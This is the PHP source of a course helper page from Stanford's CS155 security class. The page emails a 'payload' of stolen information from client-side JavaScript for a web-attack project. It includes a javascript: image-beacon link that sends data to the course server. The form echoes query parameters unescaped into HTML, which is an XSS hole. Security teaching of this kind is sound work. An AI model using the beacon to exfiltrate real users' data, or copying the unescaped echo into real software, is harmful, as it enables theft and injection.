Source code

In case you are curious, here is the source code of this page.

<?php
  $to = $_GET['to'] ? $_GET['to'] : "youremailhere@stanford.edu";
  $payload = $_GET['payload'] ? $_GET['payload'] : "xyz";
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" 
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>

<link rel="stylesheet" type="text/css" href="http://crypto.stanford.edu/seclab.css" />
<title>CS155 Email Script</title>
</head>
<body>
<div id="inner-wrapper">
<div id="outer-wrapper">
<h1 id="header">
<a href="http://crypto.stanford.edu/cs155/">CS155: Computer and Network Security</a></h1>
<div id="content" class="full whitepaper">
<div class="logo">
<a href="http://crypto.stanford.edu/seclab/">
<img src="http://crypto.stanford.edu/images/seclab-128.png" alt="Logo" /></a></div>
<h1>CS155 Email Script</h1>
<p>You can use this server side script to send automated
emails from client-side JavaScript. For example, clicking this
client-side hyperlink will cause an email to be sent by the 
crypto.stanford.edu server. Another copy of the email
always goes to 
ikhare+cs155pp3@gmail.com so that we can monitor abuse and you
can receive credit for your work.</p>
    <blockquote><tt><?php 
    $link = "javascript:void((new" .
            " Image()).src=" . 
            "'http://crypto.stanford.edu/cs155/hw_and_proj/proj2/sendmail.php?'" . 
            " + 'to=$to'" .
            " + '&payload=$payload' + '&random='" . 
            " + Math.random());";
    echo "<a href=\"$link\">$link</a>";
    ?></tt></blockquote>
    <p>The random argument is ignored, but ensures that the browser 
bypasses its cache when downloading the image. We suggest that you use 
the random argument in your scripts as well. Newlines are not allowed 
in <tt>javascript:</tt> links; if this bothers you, try 

<a href="http://scriptasylum.com/tutorials/encdec/encode-decode.html">URL encoding</a>.
The <code>void(...);</code> construct prevents the browser from 
navigating to a new page consisting of the contents
of the expression (which is what it normally does when it encounters a 
non-void expression like <code><a href="javascript:2+2">javascript:2+2</a></code>). </p>
<h2>Test form</h2>
<p>If you just want to try out the script, you can use this form.
      (For the programming project, you'll probably
want to use the JavaScript image technique shown above.)</p>
<form method="get">
<div>
<b>To:</b> 
<input name="to" value="<?php echo $to; ?>" size="40" /><i>(stanford e-mail address)
</div>
<div>
</div>
<div>
<b>Payload:</b>
<input name="payload" value="<?php echo $payload; ?>" size="40" />
<i>(the information you stole)</i>
</div>
<div>
<input type="submit" value="Send Email" name="send_submit" />

<?php
  if($_REQUEST['to']) {
    if(!preg_match("/@stanford.edu$/i", $_REQUEST['to'])) {
      echo "Please use stanford e-mail address";
    } else {
      $to = "cs155pp3@gmail.com";
	  /*
		TODO: UNCOMMENT THIS REGION ONCE YOU'RE DONE GRADING
      if (!preg_match("/CS142 Grader/i", $_SERVER['HTTP_USER_AGENT']))
        $to .= ", "  . $_REQUEST['to'];
		*/
      $subject = "Message from " . $_REQUEST['to'];
      $message = "Payload:\n\n$payload";
      mail($to, $subject, $message);
      echo "<em>Sent!</em>";
    }
  }
?>
</div>
<h2>Source code</h2>
<p>In case you are curious, here is the source code of this page.</p>
<pre><?php echo htmlspecialchars(file_get_contents(__FILE__)); ?></pre>
</form>
</div>
</div>
</div>
</body>
</html>